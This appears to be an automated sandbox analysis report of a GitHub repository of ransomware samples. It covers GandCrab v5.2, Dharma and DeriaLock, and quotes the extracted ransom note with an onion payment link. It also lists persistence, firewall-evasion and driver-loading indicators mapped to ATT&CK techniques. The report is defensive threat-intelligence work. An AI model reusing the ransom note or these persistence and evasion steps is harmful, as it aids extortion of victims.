gandcrab | hxxps://github[.]com/aDarkDev/ConF-Malware

Analysis

max time kernel
1220s
max time network
1218s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
24-04-2024 07:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/aDarkDev/ConF-Malware

Score

10^/10

gandcrab backdoor evasion persistence ransomware

Malware Config

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-259785868-298165991-4178590326-1000\XOYLPRH-MANUAL.txt

Family

gandcrab

Ransom Note

---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .XOYLPRH The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/984983c659228fa2 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmDv9MnJPpDQAuGVrODNRWTIKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2gU1R7jNx2WKAyu4W+5zlHFnKwMISBi1CwemOo6FrxnP+Z5F9bSR7OvDBsmLj7oYD6GBgpBqj3RSAVfvfE0yZSXyCRtLeJdNAFBiBqp8Y2R+O3YrHKmdGRhUeCP9vy9PMzLOXjW6P0r1BW4eYoT03JrPa/L0B0wffnS0ez96BFoTHFq52HPDCx6yhEudvoPVoM6iaVy+mvqAdvYbwBrt0yoy8C1fOlVjmR7ql4Buw8gTGwK0yub5gfz9wpLQCj3bimwDPi8jPeKPiggI2bWKz+7QkWvC2ihYFfEuZEtCM4ANvhw9QRIE71VUGcye6MeJ1R1l8/9eQQe20E3nSOCqHrLtcaPCWVcMp8LqMb9wmQcCuV87DWEYusQrSRnMKaOEJ8b8E061HMc3fS06JJDB/Fw4HhqAVwh0aPxJ3GvHUfm+rKP/M= ---END PC DATA---

URLs

http://gandcrabmfe6mnef.onion/984983c659228fa2

Signatures

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
ransomware backdoor gandcrab
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Renames multiple (270) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1336 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4580 attrib.exe

pid	process
1336	netsh.exe

pid	process
4580	attrib.exe

Sets service image path in registry 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\upyiwytocvyszqajz\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\upyiwytocvyszqajz.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qelfsrrcpvbgwgvtu\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\qelfsrrcpvbgwgvtu.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zlwtcnovrnamuk\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\zlwtcnovrnamuk.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\iurdbpycdenjmvsd\ImagePath = "\\??\\C:\\Windows\\SysWOW64\\ac\\iurdbpycdenjmvsd.sys"	mssql.exe

Drops startup file 3 IoCs

Processes:

DeriaLock.exeGandCrab.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LOGON.exe	DeriaLock.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\XOYLPRH-MANUAL.txt	GandCrab.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\5922884f59228fa0410.lock	GandCrab.exe

Executes dropped EXE 4 IoCs

Processes:

nc123.exemssql.exemssql2.exeSearchHost.exe

pid process

1188 nc123.exe
4156 mssql.exe
3816 mssql2.exe
3732 SearchHost.exe

pid	process
1188	nc123.exe
4156	mssql.exe
3816	mssql2.exe
3732	SearchHost.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

GandCrab.exeSearchHost.exe

description	ioc	process
File opened (read-only)	\??\U:	GandCrab.exe
File opened (read-only)	\??\Y:	GandCrab.exe
File opened (read-only)	\??\Z:	GandCrab.exe
File opened (read-only)	\??\D:	SearchHost.exe
File opened (read-only)	\??\L:	GandCrab.exe
File opened (read-only)	\??\Q:	GandCrab.exe
File opened (read-only)	\??\T:	GandCrab.exe
File opened (read-only)	\??\N:	GandCrab.exe
File opened (read-only)	\??\P:	GandCrab.exe
File opened (read-only)	\??\X:	GandCrab.exe
File opened (read-only)	\??\A:	GandCrab.exe
File opened (read-only)	\??\B:	GandCrab.exe
File opened (read-only)	\??\H:	GandCrab.exe
File opened (read-only)	\??\J:	GandCrab.exe
File opened (read-only)	\??\E:	GandCrab.exe
File opened (read-only)	\??\O:	GandCrab.exe
File opened (read-only)	\??\R:	GandCrab.exe
File opened (read-only)	\??\S:	GandCrab.exe
File opened (read-only)	\??\V:	GandCrab.exe
File opened (read-only)	\??\W:	GandCrab.exe
File opened (read-only)	\??\G:	GandCrab.exe
File opened (read-only)	\??\I:	GandCrab.exe
File opened (read-only)	\??\K:	GandCrab.exe
File opened (read-only)	\??\M:	GandCrab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

31 raw.githubusercontent.com
32 raw.githubusercontent.com

flow	ioc
31	raw.githubusercontent.com
32	raw.githubusercontent.com

Drops file in System32 directory 37 IoCs

Processes:

Dharma.exemssql.exeSearchHost.exe

description	ioc	process
File created	C:\Windows\SysWOW64\ac\__tmp_rar_sfx_access_check_241770906	Dharma.exe
File created	C:\Windows\SysWOW64\ac\nc123.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\unlocker.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\qelfsrrcpvbgwgvtu.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\mssql.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\upyiwytocvyszqajz.sys	mssql.exe
File created	C:\Windows\SysWOW64\ac\zlwtcnovrnamuk.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac\nc123.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER\Everything.ini	Dharma.exe
File created	C:\Windows\SysWOW64\ac\mssql.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\mssql2.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\mssql2.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\Shadow.bat	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER\1saas\LogDelete.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\qelfsrrcpvbgwgvtu.sys	mssql.exe
File created	C:\Windows\SysWOW64\ac\EVER\Everything.ini.tmp	SearchHost.exe
File opened for modification	C:\Windows\SysWOW64\ac\systembackup.bat	Dharma.exe
File created	C:\Windows\SysWOW64\ac\unlocker.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\EVER\1saas\1sass.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\EVER\1saas\LogDelete.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\EVER\Everything.ini	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER\1saas	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER\1saas\1sass.exe	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\mssqlaq.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac\mssql.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac\zlwtcnovrnamuk.sys	mssql.exe
File created	C:\Windows\SysWOW64\ac\EVER\SearchHost.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\Shadow.bat	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\iurdbpycdenjmvsd.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac\upyiwytocvyszqajz.sys	mssql.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER	Dharma.exe
File opened for modification	C:\Windows\SysWOW64\ac\EVER\SearchHost.exe	Dharma.exe
File created	C:\Windows\SysWOW64\ac\mssqlaq.sys	mssql.exe
File created	C:\Windows\SysWOW64\ac\iurdbpycdenjmvsd.sys	mssql.exe
File created	C:\Windows\SysWOW64\ac\systembackup.bat	Dharma.exe
File created	C:\Windows\SysWOW64\ac\mssql.sys	mssql.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

GandCrab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\bxmeoengtf.bmp"	GandCrab.exe

Drops file in Program Files directory 13 IoCs

Processes:

GandCrab.exe

description	ioc	process
File opened for modification	C:\Program Files\LockWrite.crw	GandCrab.exe
File opened for modification	C:\Program Files\DisconnectConvertTo.vstm	GandCrab.exe
File opened for modification	C:\Program Files\JoinUnregister.mov	GandCrab.exe
File opened for modification	C:\Program Files\SearchEdit.potx	GandCrab.exe
File created	C:\Program Files (x86)\5922884f59228fa0410.lock	GandCrab.exe
File created	C:\Program Files\5922884f59228fa0410.lock	GandCrab.exe
File opened for modification	C:\Program Files\ExportUse.dib	GandCrab.exe
File opened for modification	C:\Program Files\LockEnter.ADT	GandCrab.exe
File opened for modification	C:\Program Files\SyncEnable.rtf	GandCrab.exe
File opened for modification	C:\Program Files\UseStart.vsdm	GandCrab.exe
File created	C:\Program Files (x86)\XOYLPRH-MANUAL.txt	GandCrab.exe
File created	C:\Program Files\XOYLPRH-MANUAL.txt	GandCrab.exe
File opened for modification	C:\Program Files\DebugRedo.wmf	GandCrab.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1896 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3676 4280 WerFault.exe GandCrab.exe

pid	process
1896	sc.exe

pid	pid_target	process	target process
3676	4280	WerFault.exe	GandCrab.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

GandCrab.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	GandCrab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	GandCrab.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	GandCrab.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133584163670554814"	chrome.exe

Modifies registry class 5 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exechrome.exeOpenWith.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings	OpenWith.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

chrome.exechrome.exeGandCrab.exe

pid	process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
1284	chrome.exe
1284	chrome.exe
4280	GandCrab.exe
4280	GandCrab.exe
4280	GandCrab.exe
4280	GandCrab.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OpenWith.exe

pid process

4892 OpenWith.exe

pid	process
4892	OpenWith.exe

Suspicious behavior: LoadsDriver 32 IoCs

Processes:

mssql.exe

pid	process
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe
4156	mssql.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

Processes:

chrome.exe

pid	process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe
Token: SeShutdownPrivilege	3740	chrome.exe
Token: SeCreatePagefilePrivilege	3740	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exe

pid	process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe

Suspicious use of SendNotifyMessage 25 IoCs

Processes:

chrome.exeSearchHost.exe

pid	process
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3740	chrome.exe
3732	SearchHost.exe

Suspicious use of SetWindowsHookEx 40 IoCs

Processes:

OpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exemssql.exemssql2.exeSearchHost.exe

pid	process
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
1436	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4892	OpenWith.exe
4092	OpenWith.exe
3580	OpenWith.exe
4156	mssql.exe
3816	mssql2.exe
3732	SearchHost.exe
4156	mssql.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3740 wrote to memory of 632	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 632	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4532	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 384	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 384	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
PID 3740 wrote to memory of 4132	3740	chrome.exe	chrome.exe
